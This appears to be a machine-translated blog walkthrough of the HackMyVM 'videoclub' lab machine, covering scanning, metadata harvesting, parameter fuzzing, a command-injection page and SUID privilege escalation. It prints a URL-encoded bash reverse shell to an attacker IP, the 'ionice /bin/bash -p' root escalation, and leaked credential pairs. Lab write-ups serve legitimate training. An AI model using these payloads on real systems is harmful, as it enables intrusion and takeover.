当前位置:网站首页>Hackmyvm target series (6) -videoclub
Hackmyvm target series (6) -videoclub
2022-07-06 13:58:00 【The moon should know my meaning】
One 、 information gathering
Because it's the campus network , Too many hosts , I'll search keywords directly to find the target machine .
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Use nmap Port scan , Detect the open port of the target . Pictured , It's open ssh Service and HTTP service .
nmap -sV -sC -p- -sT 192.168.200.161
visit 3377 port .
Seeing this above, I thought it was a cms, Use whatweb Fingerprint identification .
whatweb http://192.168.200.161:3377
But I didn't recognize what it was cms.
Then scan the directory first .
gobuster dir -u http://192.168.200.161:3377 -w directory-list-2.3-medium.txt -x php,html,txt,7z,zip,bak,gz
Many things have been found , Visit one by one .
Found a directory traversal , It's full of pictures .
video
apache User manual
visit robots.txt, A long string of characters is found below , At first I thought it was base64 Encrypted , But after decryption, the code was garbled .
robots.txt There is also a file hidden at the bottom of the page .
visit list-defaulters.txt file , The following things . But at the beginning, I really didn't see why . But watch a wave carefully , I found that there was something wrong with the combination of the things I circled below .
The little friend who has read my previous article should already know exiftool What is it ,
ExifTool from Phil Harvey Development , It's free of charge 、 Cross platform open source software , For reading, writing and processing images ( The main )、 Audio and video and PDF Metadata of files such as (metadata).
steg hide, It should mean that there are hidden attributes ?
Two 、 Exploit
Use exiftool Read the metadata of the picture ,hackers.jpg This picture is the most suspicious , Let's first look at the properties of this picture
As shown in the figure , At a glance, I found this character very suspicious , Then see if other pictures and videos exist Copyright Attribute .
Wrote a python Script , All the pictures of the target are crawled down .
When crawling the video, you just need to images Change to videos that will do .
import requests
from bs4 import BeautifulSoup
re = requests.get('http://192.168.200.161:3377/images/')
soup = BeautifulSoup(re.text,'lxml')
a = soup.find_all('a')
link = list(map(lambda x:'http://192.168.200.161:3377/images/'+x['href'],a))
img_url = list(filter(lambda x:'?' not in x,link))
img_url.remove('http://192.168.200.161:3377/images//')
for url in img_url:
print(url)
r = requests.get(url).content
with open(url.split('/')[-1],'wb') as f:
f.write(r)
Final , The following information is collected in all pictures and videos .
img:
zerial_killer:bien_cabron
video
LostDVD:k1nd3rs
LostDVD=t3rm1n4t0r
LostDVD=m14_w4ll4c3
LostDVD=c0n3h34ds
secret_film:c0ntr0l
At first I thought these were accounts and passwords , Just log in one by one . But not surprisingly, they all failed .
Then compare these things with the above list-defaulters.txt Combine the files into a dictionary , As shown in the figure below .
Use dirsearch Do a directory scan , Specify the dictionary we just generated .
dirsearch -u "http://192.168.200.161:3377/" -t 50 -e php,htmp,txt,7z,zip,gz,bak -x404,500,599 -w /home/kali/Desktop/video/dict.txt
The scan results are as follows .
In the use of gobuster Do a wave of directory scanning .
gobuster dir -u "http://192.168.200.161:3377/" -t 30 -x php,htmp,txt,7z,zip,gz,bak -w dict.txt
The scan results are as follows , Than dirsearch One more. c0ntr0l.php file .
I really took this result , It's all a dictionary dirsearch As a result, one is missing , This step stuck with me for a long time , In the future, the directory scanning will be directly scanned by two scanners .
Visit all the results one by one , Other content is either video or pictures , No value .
Only c0ntr0l.php The contents of the document are blank . I feel like a play !
http://192.168.200.161:3377/c0ntr0l.php
This request does not seem to pass in parameters , That use wfuzz Do a fuzzy test , See if there's a surprise .
The dictionary should also be set as what we collected before !
wfuzz -c --hc=404 -t 500 -w dict.txt http://192.168.200.161:3377/c0ntr0l.php?FUZZ=id
give the result as follows , Find out flynn Parameters can make the result different from others .
visit http://192.168.200.161:3377/c0ntr0l.php?flynn=id
?? You can actually execute orders here . Isn't that a direct rebound shell?
stay kali On the monitor 6666 port
And then use hackbar visit
http://192.168.200.161:3377/c0ntr0l.php?f1ynn=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.200.192%2F6666%200%3E%261'
Look again kali here , Successful rebound shell, But permission is only one web jurisdiction
3、 ... and 、 Elevated privileges
Check it out. /home Catalog , Found two directories . and secret_film The catalogue looks a little familiar , Look at the pictures we collected above 、 Video information , Don't you just include this ? Take it to login .
Uh ..... Login failed , There seems to be something wrong . This secret_film How is the owner of the directory root ah
Check it out. /etc/passwd, I'm impressed , There is no such thing as secret_film This user , This pit is really many !
librarian The user's home directory is readable and accessible by any user
Look at what's in the catalogue ?
Find out flag, And this flag Any user can read directly , Get the first one flag.
Here we also find one with s Executable file with permissions , And the owner is root, Is it possible that there is suid The possibility of raising rights ?
Execute the following command , The query has suid Permission file .
find / -perm -u=s -type f 2>/dev/null
Be careful not to enter directly when performing the lifting operation
ionice /bin/sh -p, Otherwise, it will be like me , Get permission or www-data 了 . adopt which ionice, Find out ionice The command points to /usr/bin/ionice Of , This file does not have s The powers of the .
You need to enter the absolute path to successfully raise the right .
/home/librarian/ionice /bin/bash -p
Switch to /root Catalog , Did you find it root.txt, But there is one note-for-new-administrator file . Read file contents , Prompt us root.txt The file has changed places .
Use find Command direct search root.txt file
find / -name root.txt
边栏推荐
- About the parental delegation mechanism and the process of class loading
- Force deduction 152 question multiplier maximum subarray
- 力扣152题乘数最大子数组
- Why use redis
- HackMyvm靶机系列(6)-videoclub
- The difference between overloading and rewriting
- FAQs and answers to the imitation Niuke technology blog project (II)
- Relationship between hashcode() and equals()
- 实验七 常用类的使用
- MySQL锁总结(全面简洁 + 图文详解)
猜你喜欢
强化学习基础记录
2. First knowledge of C language (2)
中间件漏洞复现—apache
强化學習基礎記錄
【黑马早报】上海市监局回应钟薛高烧不化;麦趣尔承认两批次纯牛奶不合格;微信内测一个手机可注册俩号;度小满回应存款变理财产品...
Mode 1 two-way serial communication is adopted between machine a and machine B, and the specific requirements are as follows: (1) the K1 key of machine a can control the ledi of machine B to turn on a
Mixlab unbounded community white paper officially released
(original) make an electronic clock with LCD1602 display to display the current time on the LCD. The display format is "hour: minute: Second: second". There are four function keys K1 ~ K4, and the fun
MySQL锁总结(全面简洁 + 图文详解)
About the parental delegation mechanism and the process of class loading
随机推荐
FAQs and answers to the imitation Niuke technology blog project (III)
[during the interview] - how can I explain the mechanism of TCP to achieve reliable transmission
Experiment five categories and objects
Programme de jeu de cartes - confrontation homme - machine
Using spacedesk to realize any device in the LAN as a computer expansion screen
Attach the simplified sample database to the SQLSERVER database instance
Why use redis
7-3 构造散列表(PTA程序设计)
[au cours de l'entrevue] - Comment expliquer le mécanisme de transmission fiable de TCP
Write a program to simulate the traffic lights in real life.
MySQL lock summary (comprehensive and concise + graphic explanation)
实验六 继承和多态
Nuxtjs快速上手(Nuxt2)
HackMyvm靶机系列(6)-videoclub
仿牛客技术博客项目常见问题及解答(二)
编写程序,模拟现实生活中的交通信号灯。
简单理解ES6的Promise
仿牛客技术博客项目常见问题及解答(三)
HackMyvm靶机系列(4)-vulny
【头歌educoder数据表中数据的插入、修改和删除】